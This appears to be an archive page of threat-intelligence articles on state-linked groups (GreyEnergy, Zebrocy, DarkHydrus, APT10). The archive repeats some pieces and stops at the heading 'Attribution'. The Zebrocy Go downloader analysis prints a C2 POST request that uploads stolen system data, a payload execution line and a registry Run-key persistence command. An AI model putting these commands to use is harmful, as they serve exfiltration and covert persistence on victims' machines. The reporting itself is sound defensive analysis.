Category Archives: APT

Securelist: GreyEnergy’s overlap with Zebrocy

In October 2018, ESET published a report describing a set of activity they called GreyEnergy, which is believed to be a successor to BlackEnergy group. BlackEnergy (a.k.a. Sandworm) is best known, among other things, for having been involved in attacks against Ukrainian energy facilities in 2015, which led to power outages. Like its predecessor, GreyEnergy malware has been detected attacking industrial and ICS targets, mainly in Ukraine.

Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and a Sofacy subset called “Zebrocy”. The Zebrocy activity was named after malware that Sofacy group began to use since mid-November 2015 for the post-exploitation stage of attacks on its victims. Zebrocy’s targets are widely spread across the Middle East, Europe and Asia and the targets’ profiles are mostly government-related.

Both sets of activity used the same servers at the same time and targeted the same organization.

Details

Servers

In our private APT Intel report from July 2018 “Zebrocy implements new VBA anti-sandboxing tricks”, details were provided about different Zebrocy C2 servers, including 193.23.181[.]151.

In the course of our research, the following Zebrocy samples were found to use the same server to download additional components (MD5):

7f20f7fbce9deee893dbce1a1b62827d
170d2721b91482e5cabf3d2fec091151
eae0b8997c82ebd93e999d4ce14dedf5
a5cbf5a131e84cd2c0a11fca5ddaa50a
c9e1b0628ac62e5cb01bf1fa30ac8317

The URL used to download additional data looks as follows:

hxxp://193.23.181[.]151/help-desk/remote-assistant-service/PostId.php?q={hex}

This same C2 server was also used in a spearphishing email attachment sent by GreyEnergy (aka FELIXROOT), as mentioned in a FireEye report. Details on this attachment are as follows:

  • The file (11227eca89cc053fb189fac3ebf27497) with the name “Seminar.rtf” exploited CVE-2017-0199
  • “Seminar.rtf” downloaded a second stage document from: hxxp://193.23.181[.]151/Seminar.rtf (4de5adb865b5198b4f2593ad436fceff, exploiting CVE-2017-11882)
  • The original document (Seminar.rtf) was hosted on the same server and downloaded by victims from: hxxp://193.23.181[.]151/ministerstvo-energetiki/seminars/2019/06/Seminar.rtf

Another server we detected that was used both by Zebrocy and by GreyEnergy is 185.217.0[.]124. Similarly, we detected a spearphishing GreyEnergy document (a541295eca38eaa4fde122468d633083, exploiting CVE-2017-11882), also named “Seminar.rtf”.

“Seminar.rtf”, a GreyEnergy decoy document

This document downloads a GreyEnergy sample (78734cd268e5c9ab4184e1bbe21a6eb9) from the following SMB link:

\\185.217.0[.]124\Doc\Seminar\Seminar_2018_1.AO-A

The following Zebrocy samples use this server as C2:

7f20f7fbce9deee893dbce1a1b62827d
170d2721b91482e5cabf3d2fec091151
3803af6700ff4f712cd698cee262d4ac
e3100228f90692a19f88d9acb620960d

They retrieve additional data from the following URL:

hxxp://185.217.0[.]124/help-desk/remote-assistant-service/PostId.php?q={hex}

It is worth noting that at least two samples from the above list use both 193.23.181[.]151 and 185.217.0[.]124 as C2s.

Hosts associated with GreyEnergy and Zebrocy

Attacked company

Additionally, both GreyEnergy and Zebrocy spearphishing documents targeted a number of industrial companies in Kazakhstan. One of them was attacked in June 2018.

GreyEnergy and Zebrocy overlap

Attack timeframe

A spearphishing document entitled ‘Seminar.rtf’, which retrieved a GreyEnergy sample, was sent to the company approximately on June 21, 2018, followed by a Zebrocy spearphishing document sent approximately on June 28:

‘(28.06.18) Izmeneniya v prikaz PK.doc’ Zebrocy decoy document translation:
‘Changes to order, Republic of Kazakhstan’

The two C2 servers discussed above were actively used by Zebrocy and GreyEnergy almost at the same time:

  • 193.23.181[.]151 was used by GreyEnergy and Zebrocy in June 2018
  • 185.217.0[.]124 was used by GreyEnergy between May and June 2018 and by Zebrocy in June 2018

Conclusions

The GreyEnergy/BlackEnergy actor is an advanced group that possesses extensive knowledge on penetrating into their victim´s networks and exploiting any vulnerabilities it finds. This actor has demonstrated its ability to update its tools and infrastructure in order to avoid detection, tracking, and attribution.

Though no direct evidence exists on the origins of GreyEnergy, the links between a Sofacy subset known as Zebrocy and GreyEnergy suggest that these groups are related, as has been suggested before by some public analysis. In this paper, we detailed how both groups shared the same C2 server infrastructure during a certain period of time and how they both targeted the same organization almost at the same time, which seems to confirm the relationship’s existence.

For more information about APT reports please contact: intelreports@kaspersky.com

For more information about ICS threats please contact: ics-cert@kaspersky.com



Securelist

GreyEnergy’s overlap with Zebrocy

In October 2018, ESET published a report describing a set of activity they called GreyEnergy, which is believed to be a successor to BlackEnergy group. BlackEnergy (a.k.a. Sandworm) is best known, among other things, for having been involved in attacks against Ukrainian energy facilities in 2015, which led to power outages. Like its predecessor, GreyEnergy malware has been detected attacking industrial and ICS targets, mainly in Ukraine.

Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and a Sofacy subset called “Zebrocy”. The Zebrocy activity was named after malware that Sofacy group began to use since mid-November 2015 for the post-exploitation stage of attacks on its victims. Zebrocy’s targets are widely spread across the Middle East, Europe and Asia and the targets’ profiles are mostly government-related.

Both sets of activity used the same servers at the same time and targeted the same organization.

Details

Servers

In our private APT Intel report from July 2018 “Zebrocy implements new VBA anti-sandboxing tricks”, details were provided about different Zebrocy C2 servers, including 193.23.181[.]151.

In the course of our research, the following Zebrocy samples were found to use the same server to download additional components (MD5):

7f20f7fbce9deee893dbce1a1b62827d
170d2721b91482e5cabf3d2fec091151
eae0b8997c82ebd93e999d4ce14dedf5
a5cbf5a131e84cd2c0a11fca5ddaa50a
c9e1b0628ac62e5cb01bf1fa30ac8317

The URL used to download additional data looks as follows:

hxxp://193.23.181[.]151/help-desk/remote-assistant-service/PostId.php?q={hex}

This same C2 server was also used in a spearphishing email attachment sent by GreyEnergy (aka FELIXROOT), as mentioned in a FireEye report. Details on this attachment are as follows:

  • The file (11227eca89cc053fb189fac3ebf27497) with the name “Seminar.rtf” exploited CVE-2017-0199
  • “Seminar.rtf” downloaded a second stage document from: hxxp://193.23.181[.]151/Seminar.rtf (4de5adb865b5198b4f2593ad436fceff, exploiting CVE-2017-11882)
  • The original document (Seminar.rtf) was hosted on the same server and downloaded by victims from: hxxp://193.23.181[.]151/ministerstvo-energetiki/seminars/2019/06/Seminar.rtf

Another server we detected that was used both by Zebrocy and by GreyEnergy is 185.217.0[.]124. Similarly, we detected a spearphishing GreyEnergy document (a541295eca38eaa4fde122468d633083, exploiting CVE-2017-11882), also named “Seminar.rtf”.

“Seminar.rtf”, a GreyEnergy decoy document

This document downloads a GreyEnergy sample (78734cd268e5c9ab4184e1bbe21a6eb9) from the following SMB link:

\\185.217.0[.]124\Doc\Seminar\Seminar_2018_1.AO-A

The following Zebrocy samples use this server as C2:

7f20f7fbce9deee893dbce1a1b62827d
170d2721b91482e5cabf3d2fec091151
3803af6700ff4f712cd698cee262d4ac
e3100228f90692a19f88d9acb620960d

They retrieve additional data from the following URL:

hxxp://185.217.0[.]124/help-desk/remote-assistant-service/PostId.php?q={hex}

It is worth noting that at least two samples from the above list use both 193.23.181[.]151 and 185.217.0[.]124 as C2s.

Hosts associated with GreyEnergy and Zebrocy

Attacked company

Additionally, both GreyEnergy and Zebrocy spearphishing documents targeted a number of industrial companies in Kazakhstan. One of them was attacked in June 2018.

GreyEnergy and Zebrocy overlap

Attack timeframe

A spearphishing document entitled ‘Seminar.rtf’, which retrieved a GreyEnergy sample, was sent to the company approximately on June 21, 2018, followed by a Zebrocy spearphishing document sent approximately on June 28:

‘(28.06.18) Izmeneniya v prikaz PK.doc’ Zebrocy decoy document translation:
‘Changes to order, Republic of Kazakhstan’

The two C2 servers discussed above were actively used by Zebrocy and GreyEnergy almost at the same time:

  • 193.23.181[.]151 was used by GreyEnergy and Zebrocy in June 2018
  • 185.217.0[.]124 was used by GreyEnergy between May and June 2018 and by Zebrocy in June 2018

Conclusions

The GreyEnergy/BlackEnergy actor is an advanced group that possesses extensive knowledge on penetrating into their victim´s networks and exploiting any vulnerabilities it finds. This actor has demonstrated its ability to update its tools and infrastructure in order to avoid detection, tracking, and attribution.

Though no direct evidence exists on the origins of GreyEnergy, the links between a Sofacy subset known as Zebrocy and GreyEnergy suggest that these groups are related, as has been suggested before by some public analysis. In this paper, we detailed how both groups shared the same C2 server infrastructure during a certain period of time and how they both targeted the same organization almost at the same time, which seems to confirm the relationship’s existence.

For more information about APT reports please contact: intelreports@kaspersky.com

For more information about ICS threats please contact: ics-cert@kaspersky.com

Critical RCE Flaw in Linux APT Allows Remote Attackers to Hack Systems

Just in time… Some cybersecurity experts this week arguing over Twitter in favor of not using HTTPS and suggesting software developers to only rely on signature-based package verification, just because APT on Linux also does the same. Ironically, a security researcher just today revealed details of a new critical remote code execution flaw in the apt-get utility that can be exploited by a

Security Affairs newsletter Round 197 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

TA505 Group adds new ServHelper Backdoor and FlawedGrace RAT to its arsenal
Computers at the City Hall of Del Rio were infected by ransomware
German Watchdog will request Facebook changes
Unsecured MongoDB archive exposed 202 Million private resumes
Which is the link between Ryuk ransomware and TrickBot?
Zurich refuses to pay Mondelez for NotPetya damages because its ‘an act of war
A flaw in vCard processing could allow hackers to compromise a Win PC
Cranes, drills and other industrial machines exposed to hack by RF protocols
Mozilla will disable Adobe Flash by default starting from Firefox 69
Too many issues in Pentagon networks expose it to cybersecurity risks
Critical bug in Amadeus flight booking system affects 141 airlines
Experts link attack on Chilean interbank network Redbanc NK Lazarus APT
GreyEnergy: Welcome to 2019
I swiped right, Viewing sensitive data cached in your Safari browser.
Multiple Fortnite flaws allowed experts to takeover players accounts
Collection #1 dump, 773 million emails, 21 million passwords
Drupal fixes 2 critical code execution issues flaws in Drupal 7, 8.5 and 8.6
South Korea: hackers compromised Defense Acquisition Program Administration PCs
Unprotected server of Oklahoma Department of Securities exposes millions of government files
Android apps use the motion sensor to evade detection and deliver Anubis malware
Attacks in the wild leverage flaw in ThinkPHP Framework
Fallout Exploit Kit now includes exploit for CVE-2018-15982 Flash zero-day
Oracle critical patch advisory addresses 284 flaws, 33 critical
Twitter fixed a bug in its Android App that exposed Protected Tweets
6 Reasons We Need to Boost Cybersecurity Focus in 2019
A bug in Microsoft partner portal ‘exposes ‘ support requests to all partners
ES File Explorer vulnerabilities potentially impact 100 Million Users

Pierluigi Paganini

(SecurityAffairs – Microsoft partner portal, data leak)

The post Security Affairs newsletter Round 197 – News of the week appeared first on Security Affairs.

DarkHydrus adds Google Drive support to its RogueRobin Trojan

Security experts attributed new malicious campaigns to the DarkHydrus APT group (aka Lazy Meerkat), threat actors used a new variant of the RogueRobin Trojan and leveraged Google Drive as an alternative C2 channel.

DarkHydrus was first discovered by experts at Palo Alto Networks’ Unit 42 team in July when the group carried out attacks aimed at a government agency in the Middle East.

Threat actors focused their activity in the Middle East, they used weaponized Microsoft Excel documents to compromise victims’ systems.

On January 9, experts at 360’s Threat Intelligence Center (360 TIC) first observed attacks leveraging lure Excel documents written in Arabic.

“This malware is a lure Excel document with name ‘الفهارس.xlsm’. When it is opened, embedded VBA macro is trigged to run. That macro drops 12-B-366.txt to ‘%TEMP%’ directory first, then leverages regsvr32.exe to run 12-B-366.txt “reads the analysis published by TIC.

The final stage malware is a backdoor written in C#.

According to the analysis made by malware researchers from Palo Alto Networks, the text file includes parts of a Windows Script Component (.SCT) file that once concatenated delivers a version of the RogueRobin trojan.

“The New_Macro function starts by concatenating several strings to create a PowerShell script that it will write to the file %TEMP%\WINDOWSTEMP.ps1. The function builds the contents of a second file by concatenating several strings together, but this second file is a .sct file that the function will write to a file %TEMP%\12-B-366.txt.” reads the analysis published by PaloAlto Networks.

“While .sct files are used by a multitude of applications, in this instance it is being used as a Windows Script Component file. The function then uses the built-in Shell function to run the following command, which effectively executes the .sct file stored in 12-B-366.txt

The samples of the RogueRobin Trojan analyzed by Palo Alto Networks implement additional functionality, they include the use of Google Drive API. This new feature allows the attackers to use Google Drive as an alternative Command and Control channel and make hard the detection of malicious traffic.

The main communication channel with the C2 server is the DNS tunneling.

“A command that was not available in the original PowerShell variant of RogueRobin but is available with the new C# variant is the x_mode. This command is particularly interesting as it enables an alternative command and control channel that uses the Google Drive API.” continues Palo Alto Networks. “The x_mode command is disabled by default, but when enabled via a command received from the DNS tunneling channel, it allows RogueRobin to receive a unique identifier and to get jobs by using Google Drive API requests.”

Once activated, the malware will receive via DNS tunneling from the C2 server a list of settings that allows it to interact with the Google Drive.

The commands are exchanged leveraging a file uploaded by the Trojan to Google Drive, every change to the is interpreted as a command.

The RogueRobin Trojan also checks is it is running in a virtualized environment or a sandbox before triggering the payload.

According to Palo Alto Networks, the malware also checks for common analysis tools running on the system and the presence of a debugger.

“Just like in the sandbox checks, the Trojan checks for an attached debugger each time it issues a DNS query; if it does detect a debugger it will issue a DNS query to resolve 676f6f646c75636b.gogle[.]co. The domain is legitimate and owned by Google. The subdomain 676f6f646c75636b is a hex encoded string which decodes to goodluck.” states Palo Alto Networks.

Experts speculate the DarkHydrus group continues its operations and improved its techniques and its arsenal. The recent attacks show DarkHydrus group is abusing open-source penetration testing techniques such as the AppLocker bypass. 

Further information, including IoCs for the malware used by the group, are reported in the analysis published by both 360 TIC and Palo Alto Networks.

Pierluigi Paganini

(SecurityAffairs – hacking, DarkHydrus)

The post DarkHydrus adds Google Drive support to its RogueRobin Trojan appeared first on Security Affairs.

Security Affairs: DarkHydrus adds Google Drive support to its RogueRobin Trojan

Security experts attributed new malicious campaigns to the DarkHydrus APT group (aka Lazy Meerkat), threat actors used a new variant of the RogueRobin Trojan and leveraged Google Drive as an alternative C2 channel.

DarkHydrus was first discovered by experts at Palo Alto Networks’ Unit 42 team in July when the group carried out attacks aimed at a government agency in the Middle East.

Threat actors focused their activity in the Middle East, they used weaponized Microsoft Excel documents to compromise victims’ systems.

On January 9, experts at 360’s Threat Intelligence Center (360 TIC) first observed attacks leveraging lure Excel documents written in Arabic.

“This malware is a lure Excel document with name ‘الفهارس.xlsm’. When it is opened, embedded VBA macro is trigged to run. That macro drops 12-B-366.txt to ‘%TEMP%’ directory first, then leverages regsvr32.exe to run 12-B-366.txt “reads the analysis published by TIC.

The final stage malware is a backdoor written in C#.

According to the analysis made by malware researchers from Palo Alto Networks, the text file includes parts of a Windows Script Component (.SCT) file that once concatenated delivers a version of the RogueRobin trojan.

“The New_Macro function starts by concatenating several strings to create a PowerShell script that it will write to the file %TEMP%\WINDOWSTEMP.ps1. The function builds the contents of a second file by concatenating several strings together, but this second file is a .sct file that the function will write to a file %TEMP%\12-B-366.txt.” reads the analysis published by PaloAlto Networks.

“While .sct files are used by a multitude of applications, in this instance it is being used as a Windows Script Component file. The function then uses the built-in Shell function to run the following command, which effectively executes the .sct file stored in 12-B-366.txt“

The samples of the RogueRobin Trojan analyzed by Palo Alto Networks implement additional functionality, they include the use of Google Drive API. This new feature allows the attackers to use Google Drive as an alternative Command and Control channel and make hard the detection of malicious traffic.

The main communication channel with the C2 server is the DNS tunneling.

“A command that was not available in the original PowerShell variant of RogueRobin but is available with the new C# variant is the x_mode. This command is particularly interesting as it enables an alternative command and control channel that uses the Google Drive API.” continues Palo Alto Networks. “The x_mode command is disabled by default, but when enabled via a command received from the DNS tunneling channel, it allows RogueRobin to receive a unique identifier and to get jobs by using Google Drive API requests.”

Once activated, the malware will receive via DNS tunneling from the C2 server a list of settings that allows it to interact with the Google Drive.

The commands are exchanged leveraging a file uploaded by the Trojan to Google Drive, every change to the is interpreted as a command.

The RogueRobin Trojan also checks is it is running in a virtualized environment or a sandbox before triggering the payload.

According to Palo Alto Networks, the malware also checks for common analysis tools running on the system and the presence of a debugger.

“Just like in the sandbox checks, the Trojan checks for an attached debugger each time it issues a DNS query; if it does detect a debugger it will issue a DNS query to resolve 676f6f646c75636b.gogle[.]co. The domain is legitimate and owned by Google. The subdomain 676f6f646c75636b is a hex encoded string which decodes to goodluck.” states Palo Alto Networks.

Experts speculate the DarkHydrus group continues its operations and improved its techniques and its arsenal. The recent attacks show DarkHydrus group is abusing open-source penetration testing techniques such as the AppLocker bypass. 

Further information, including IoCs for the malware used by the group, are reported in the analysis published by both 360 TIC and Palo Alto Networks.

Pierluigi Paganini

(SecurityAffairs – hacking, DarkHydrus)

The post DarkHydrus adds Google Drive support to its RogueRobin Trojan appeared first on Security Affairs.



Security Affairs

South Korea: hackers compromised Defense Acquisition Program Administration PCs

South Korea – Allegedstate-sponsored hackers compromised 10 PCs at ministry’s Defense Acquisition Program Administration.

Unknown hackers compromised 10 PCs at ministry’s Defense Acquisition Program Administration which is the office that manages the military procurement.

The news was confirmed by the South Korea Ministry of National Defense.

“It has been turned out that 30 computers installed on the internal system of the Defense Acquisition Program Administration, in charge of arms procurement such as next-generation fighter jets, have come under simultaneous virtual attacks and 10 out of them saw internal data leaked.”
the Korea’s 
Dong-A Ilbo reports

“As cyberattacks have continued on major Korean foreign affairs facilities including the Korean presidential office Cheong Wa Dae, the National Assembly and the Defense Acquisition Program Administration, concerns are ever increasing regarding the government’s cyber security capabilities.”

The systems targeted by the hackers contain sensitive data on purchases for military equipment and weapons, including “next-generation fighter jets,”

The security breach was disclosed this week in a report from a South Korean politician.

The National Assembly and the Defense Acquisition Program Administration confirmed that no confidential information was accessed or exfiltrated by hackers.

The security breach has occurred on October 4, 2018, the attack aimed at 30 computers, but only 10 of them were hacked. The intrusion was spotted on October 26 when the National Intelligence Service noticed suspicious traffic on IP associated with the Agency.

The intrusion coincides with another attack on Liberty Korea Party Rep. Baek Seung-joo’s email account. Experts believe that a threat actor politically motivated targeted systems of Korea’s major organizations simultaneously. 

“It is dubious whether the agency issued a conclusion to conceal damage and minimize the scope of penetration,” Rep. Lee pointed out. “Further investigation to find out if the source of attacks is North Korea or any other party.”

The A Ilbo added that an intelligence agent said that further review will be executed on defense measures implemented to protect by the Defense Acquisition Program Administration’s systems.

Pierluigi Paganini

(SecurityAffairs – South Korea, Defense Acquisition Program Administration)

The post South Korea: hackers compromised Defense Acquisition Program Administration PCs appeared first on Security Affairs.

Report: Iranian APT Actors Regroup After Main Security Forum Shuts Down

Iranian state-sponsored hackers are regrouping after the shutdown last year of their main security forum, migrating to other forums and making new connections for potential cyber-response against mounting political pressures from the United States and Europe, according to a new report.

The post Report: Iranian APT Actors Regroup After Main...

Read the whole entry... »

Related Stories

The Advanced Persistent Threat files: APT10

We’ve heard a lot about Advanced Persistent Threats (APTs) over the past few years. As a refresher, APTs are prolonged, aimed attacks on specific targets with the intention to compromise their systems and gain information from or about that target. While the targets may be anyone or anything—a person, business, or other organization—APTs are often associated with government or military operations, as they tend to be the organizations with the resources necessary to conduct such an attack. Starting with Mandiant’s APT1 report in 2013, there’s been a continuous stream of exposure of nation-state hacking at scale.

Cybersecurity companies have gotten relatively good at observing and analyzing the tools and tactics of nation-state threat actors; they’re less good at placing these actions in context sufficient enough for defenders to make solid risk assessments. So we’re going to take a look at a few APT groups from a broader perspective and see how they fit into the larger threat landscape.

Today, we’re beginning with APT10. (Note: These groups have a panoply of different names, but for simplicity’s sake, we’re going to borrow Mandiant’s naming conventions for Chinese groups.)

Who is APT10?

First observed in 2009, APT10 is most commonly attributed via open source research to the Chinese Ministry of State Security (MSS). MSS attacks are typically, but not limited to: intelligence targets surrounding trade negotiations, research and development in competition with Chinese commercial entities, and high value counter intelligence targets overseas. As an example of a trade negotiation op, Fidelis Security observed a watering hole attack in February 2017 targeting members of the National Foreign Trade Council, a US trade lobby group.

A commonly-used tool of APT10 is Scanbox, which is a form of malware that can offer insights into their targeting priorities. Scanbox has been observed on assorted industrial sector targets in the US and Japan, but also on Uighur dissidents overseas. While this supports the thesis of APT10 being a government threat group, we caution defenders against associating any one piece of malware exclusively with one group. Countries maintain multiple threat groups, all of whom are fully capable of collaborating and sharing TTPs.

Malware commonly deployed

APT10 is known for deploying the following malware:

Note: Variants of PlugX and Poison Ivy were developed and deployed by Chinese state-sponsored actors. They have since been sold and resold to individual threat actors across multiple nations. At time of writing, it is inappropriate to attribute an attack to Chinese threat actors based on PlugX or Poison Ivy deployment alone.

Should you be worried?

That depends on the type of organization you run. APT10 has been observed to most commonly target construction, engineering, aerospace, and regional telecoms, as well as traditional government targets. If your company exists outside these verticals, it’s unlikely that APT10 would expend the time and resources to target you. For companies outside the targeting profile, it’s much more cost effective to spend defense budgets on common vulnerabilities that are most leveraged by common attackers.

What might they do next?

Like most APTs, APT10 has traditionally targeted at scale when attacking commercial enterprise. However, a more recent report by Price Waterhouse Cooper and BAE Systems suggests that they’ve begin devoting a portion of their operations to targeting Managed Service Providers (MSPs), most likely in an attempt to exfiltrate sensitive client data. Given that there’s been increasing awareness of advanced threats by high-value targets, continuing to target MSPs in this way is a plausible means of obtaining the same desired data at a lesser cost.

Further resources

If you’d like to do some additional reading on APTs, and specifically APT10, take a look at the following resources:

The post The Advanced Persistent Threat files: APT10 appeared first on Malwarebytes Labs.

A Zebrocy Go Downloader

Last year at SAS2018 in Cancun, Mexico, “Masha and these Bears” included discussion of a subset of Sofacy activity and malware that we call “Zebrocy”, and predictions for the decline of SPLM/XAgent Sofacy activity coinciding with the acceleration of Zebrocy activity and innovation. Zebrocy was initially introduced as a Sofacy backdoor package in 2015, but the Zebrocy cluster has carved a new approach to malware development and delivery to the world of Sofacy. In line with this approach, we will present more on this Zebrocy innovation and activity playing out at SAS 2019 in Singapore.

Our colleagues at Palo Alto recently posted an analysis of Zebrocy malware. The analysis is good and marked their first detection of a Zebrocy Go variant as October 11, 2018. Because there is much to this cluster, clarifying and adding to the discussion is always productive.

Our original “Zebrocy Innovates – Layered Spearphishing Attachments and Go Downloaders” June 2018 writeup documents the very same downloader, putting the initial deployment of Zebrocy Go downloader activity at May 10, 2018. And while the targeting in the May event was most likely different from the October event, we documented this same Go downloader and same C2 was used to target a Kyrgyzstan organization. Also interesting is that the exact same system was a previous Zebrocy target earlier in 2018. So, knowing that this same activity is being reported on as “new” six months later tells us a bit about the willingness of this group to re-use rare components and infrastructure across different targets.

While they are innovating with additional languages, as we predicted in early 2018, their infrastructure and individual components may have more longevity than predicted. Additionally, at the beginning of 2018, we predicted the volume of Zebrocy activity and innovation will continue to increase, while the more traditional SPLM/XAgent activity will continue to decline. Reporting on SPLM/XAgent certainly has followed this course in 2018 as SPLM/XAgent detections wind down globally, as has Sofacy’s use of this malware from our perspective.

Much of the content below is reprinted from our June document.

The Sofacy subset we identify as “Zebrocy” continues to target Central Asian government related organizations, both in-country and remote locations, along with a new middle eastern diplomatic target. And, as predicted, they continue to build out their malware set with a variety of scripts and managed code. In this case, we see new spearphishing components – an LNK file maintaining powershell scripts and a Go-implemented system information collector/downloader. This is the first time we have observed a well-known APT deploy malware with this compiled, open source language “Go”. There is much continued recent Zebrocy activity using their previously known malware set as well.

Starting in May 2018, Zebrocy spearphished Central Asian government related targets directly with this new Go downloader. For example, the attachment name included one “30-144.arj” compressed archive, an older archiver type handled by 7zip, Rar/WinRAR, and others. Users found “30-144.exe” inside the archive with an altered file icon made to look like the file was a Word document (regardless of the .exe file extension). And in a similar fashion in early June, Zebrocy spearphished over a half-dozen accounts targeting several Central Asian countries’ diplomatic organizations with a similar scheme “2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx”, sending out a more common Zebrocy Delphi downloader.

In other cases, delivery of the new Go downloader was not straightforward. The new Go downloader also was delivered with a new spearphishing object that rolls up multiple layers of LNK file, powershell scripts, base64 encoded content, .docx files and the Go downloader files. The downloader is an unusually large executable at over 1.5mb, written to disk and launched by a powershell script. So the attachment that arrived over email was large.
The powershell script reads the file’s contents from a very large LNK file that was included as an email attachment, and then writes it to disk along with a Word document of the same name. So, launching the downloader is followed with the opening of an identically named decoy word document with “WINWORD.EXE” /n “***\30-276(pril).docx” /o”. The downloader collects a large amount of system information and POSTs it to a known Zebrocy C2, then pulls down known Zebrocy Delphi payload code, launches it, and deletes itself.

We observed previous, somewhat similar spearphishing scenarios with an archive containing .LNK, .docx, and base64 encoded executable code, delivering offensive Finfisher objects in separate intrusion activity clusters. This activity was not Sofacy, but the spearphishing techniques were somewhat similar – the layered powershell script attachment technique is not the same, but not altogether new.

And, it is important to reiterate that these Central Asian government and diplomatic targets are often geolocated remotely. In the list of target geolocations, notice countries like South Korea, the Netherlands, etc. In addition to Zebrocy Go downloader data, this report provides data on various other observed Zebrocy malware and targets over the past three months.

Spreading

Mostly all observed Zebrocy activity involves spearphishing. Spearphish attachments arrive with .rar or .arj extensions. Filename themes include official government correspondence invitations, embassy notes, and other relevant items of interest to diplomatic and government staff. Enclosed objects may be LNK, docx, or exe files.

A decoy PDF that directly targeted a Central Asian nation is included in one of the .arj attachments alongside the Go downloader. The content is titled “Possible joint projects in cooperation with the International Academy of Sciences” and lists multiple potential projects requiring international cooperation with Tajikistan and other countries. This document appears to be a legitimate one that was stolen, created mid-May 2018. While we cannot reprint potentially leaked information publicly, clearly, the document was intended for a Russian-language reader.

Powershell launcher from within LNK

The LNK containing two layers of powershell script and base64 encoded content is an unusual implementation – contents from a couple are listed at the technical appendix. When opened, the script opens the shortcut file it is delivered within (“30-276(pril).docx.lnk”), pulls out the base64 encoded contents (in one case, from byte 3507 to byte 6708744), base64 decodes the content and another layer of the same powershell decoding. This script writes two files to disk as “30-276(pril).exe” and “30-276(pril).docx” and opens both files, leading to the launch of the Go language system information collector/downloader and a decoy Word document.

Go System Information Collector/Downloader

Md5              333d2b9e99b36fb42f9e79a2833fad9c
Sha256         fcf03bf5ef4babce577dd13483391344e957fd2c855624c9f0573880b8cba62e
Size              1.79mb (upx packed – 3.5mb upx unpacked)
CompiledOn Stomped (Wed Dec 31 17:00:00 1969)
Type             PE 32-bit Go executable
Name           30-276(pril).exe

This new Go component not only downloads and executes another Zebrocy component, but it enumerates and collects a fair amount of system data for upload to its C2, prior to downloading and executing any further modules. It simply collects data using the systeminfo utility, and in turn makes a variety of WMI calls.

After collecting system information, the backdoor calls out to POST to its hardcoded C2, in this case a hardcoded IP/Url. Note that the backdoor simply uses the default Go user-agent:
“POST /technet-support/library/online-service-description.php?id_name=345XXXD5
HTTP/1.1
Host: 89.37.226.148
User-Agent: Go-http-client/1.1”

With this POST, the module uploads all of the system information it just gathered with the exhaustive systeminfo utility over http: hostname, date/time, all hardware, hotfix, service and software information.

The module then retrieves the gzip’d, better known Zebrocy dropper over port 80 as part of an encoded jpg file, writes it to disk, and executes from a command line:
“cmd /C c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe”
and adds a run key persistence entry with the system utility reg.exe:
cmd /C “reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Driveupd /d
c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe /f”

Zebrocy AutoIT Dropper

Md5              3c58ed6913593671666283cb7315dec3
Sha256         96c3700ad639faa85982047e05fbd71c3dfd502b09f9860685498124e7dbaa46
Size              478.5kb (upx-packed)
Compiled     Fri Apr 27 06:40:32 2018
Type             PE32 AutoIT executable
Path, Name  appdata\Identities\{83AF1378-986F-1673-091A-02681FA62C3B}\w32srv.exe

This AutoIT dropper writes out a Delphi payload, consistent with previous behavior going back to November 2015, initially described in our January 2016 report “Zebrocy – Sofacy APT Deploys New Delphi Payload”.

Zebrocy Delphi Payload

Md5               2f83acae57f040ac486eca5890649381
Sha256          f9e96b2a453ff8922b1e858ca2d74156cb7ba5e04b3e936b77254619e6afa4e8
Size               786kb
Compiled       Fri Jun 19 16:22:17 1992 (stomped/altered)
Type              PE32 exe [v4.7.7] Path, Name   c:\ProgramData\Protection\Active\armpro.exe

Interestingly the final payload reverts back to an earlier version [v4.7.7]. A “TURBO” command is missing from this Zebrocy Delphi backdoor command list .
SYS_INFO
SCAN_ALL
SCAN_LIST
DOWNLOAD_DAY
DOWNLOAD_LIST
CREATE_FOLDER
UPLOAD_FILE
FILE_EXECUTE
DELETE_FILES
REG_WRITE_VALUE
REG_READ_VALUE
REG_DELETE_VALUE
REG_GET_KEYS_VALUES
REG_DELETE_KEY
KILL_PROCESS
CONFIG
GET_NETWORK
CMD_EXECUTE
DOWNLOAD_DATE
DELETE_FOLDER
UPLOAD_AND_EXECUTE_FILE
SCREENSHOTS
FILE_EXECUTE
SET_HIDDEN_ATTR
START
STOP
KILL_MYSELF

Infrastructure

Zebrocy backdoors are configured to directly communicate with IP assigned web server hosts over port 80, and apparently the group favors Debian Linux for this part of infrastructure: Apache 2.4.10 running on Debian Linux. A somewhat sloppy approach continues, and the group set up and configured one of the sites with digital certificates using a typical Sofacy-sounding domain that they have not yet registered: “weekpost.org”. Digital certificate details are provided in the appendix.

These “fast setup” VPS servers run in “qhoster[.]com” can be paid for with Webmoney, Bitcoin, Litecoin, Dash, Alfa Click, Qiwi, transfers from Sberbank Rossii, Svyaznoy, Promsvyazbank, and more. Although, it appears that Bitcoin and Dash may be of the most interest to help ensure anonymous transactions. Dataclub provides similar payment methods:

One of the VPS IP addresses (80.255.12[.]252) is hosted in the “afterburst[.]com”/Oxygem range. This service is the odd one out and is unusual because it only supports VISA/major credit cards and Paypal at checkout. If other payment options are provided, they are not a part of the public interface.

Victims and Targeting

Zebrocy Go downloader 2018 targets continue to be Central Asian government foreign policy and administrative related. Some of these organizations are geolocated in-country, or locally, and some are located remotely. In several cases, these same systems have seen multiple artefacts from Zebrocy over the course of 2017 and early 2018:
• Kazakhstan
• Kyrgyzstan
• Azerbaijan
• Tajikistan

Additional recent Zebrocy target geo-locations (targeting various Central Asian/ex-USSR local and remote government locations):
• Qatar
• Ukraine
• Czech Republic
• Mongolia
• Jordan
• Germany
• Belgium
• Iran
• Turkey
• Armenia
• Afghanistan
• South Korea
• Turkmenistan
• Kazakhstan
• Netherlands
• Kuwait
• United Arab Emirates
• Spain
• Poland
• Qatar
• Oman
• Switzerland
• Mongolia
• Kyrgyzstan
• United Kingdom

Attribution

